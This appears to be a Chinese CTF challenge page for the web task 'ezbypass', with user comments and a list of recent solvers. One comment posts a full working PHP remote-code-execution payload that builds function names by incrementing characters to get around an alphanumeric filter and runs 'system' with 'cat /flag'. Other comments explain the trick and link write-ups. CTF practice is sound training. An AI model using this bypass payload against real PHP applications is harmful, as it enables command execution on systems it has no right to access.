ezbypassWEB 未解决

分数: 25 金币: 4
题目作者: XHH1H
一  血: volcano
一血奖励: 5金币
解  决: 643
提  示:
描  述:
flag{}
评论
鲲中霸王 3月前

code=$_=(_/_._)[_];$__=%2B%2B$_;%2B%2B$_;$__=_.$_.$__;%2B%2B$_;%2B%2B$_;$__.=%2B%2B$_;$__.=%2B%2B$_;$$__[_]($$__[__]);&_= system&__=cat /flag

回复 1

lzhh530393027 4月前

看懂解析了,但是再做一次也不会

回复 0

jiubanyipeng 10月前

脚本参考:https://www.jiubanyipeng.com/1851.html

回复 2

Jiafeng 1年前

我去,属于知道思路,但是不敢实践的题目;(无数子字母RCE)

回复 0

小丁小丁少发神经 1年前

求问为啥设计成system和cat /flag用两个参数传,为什么不可以构造出$_POST[_]然后赋值_=system(cat /flag)呢(验证一下确实不行,但是不懂为啥)

回复 0
shingu 12月前

我也有个疑问。我花了好几个小时去研究,但也是一知半解。目前得到的答案是:`$$_[_]` 等价于 `${$_POST['_']}`,即用 `$_POST['_']` 的值作为变量名。如果使用`_=system(cat /flag)`,PHP会尝试访问名为 `$system('cat /flag')` 的变量,这显然非法,所以行不通。

回复 0

不会写代码的菜鸟 1年前

这道题完全不是我能做的,有答案也看不懂

回复 1

modeng 1年前

以下是我的思路与总结,希望对你有所帮助https://blog.csdn.net/m_de_g/article/details/138110100?spm=1001.2014.3001.5501

回复 5
Jiafeng 1年前

牛逼,可以直接造出N字符,那就好搞了;

回复 0

hutiaan 2年前

难,为了难而难

回复 1

不懂就问 2年前

参考:https://blog.csdn.net/qq_36292543/article/details/136623586

回复 2

不会编程的崽 2年前

自增绕过,最后的payload可以在burp里进行对特殊字符的url编码

回复 0

WriteUp

image
Jesen

2 金币

评分(4)

解题动态

Yvvv1y 攻破了该题 8小时前
pigggg 攻破了该题 9小时前
FTJJJ 攻破了该题 1天前
654620946 攻破了该题 2天前
Zhengzanmei 攻破了该题 5天前
爱喝畅汁 攻破了该题 5天前
路痴通 攻破了该题 6天前
lee8ly 攻破了该题 6天前
hyj11125 攻破了该题 8天前
SamJij 攻破了该题 8天前
Arno_Zoffy 攻破了该题 8天前
磊诺 攻破了该题 8天前
sycazdcy 攻破了该题 8天前
沧颜 攻破了该题 10天前
3xsh0re 攻破了该题 11天前
小马哥 攻破了该题 11天前
扬哥真硬 攻破了该题 12天前
wasdwq 攻破了该题 14天前
shi4bushi2 攻破了该题 14天前
零零凌ling 攻破了该题 14天前
问题反馈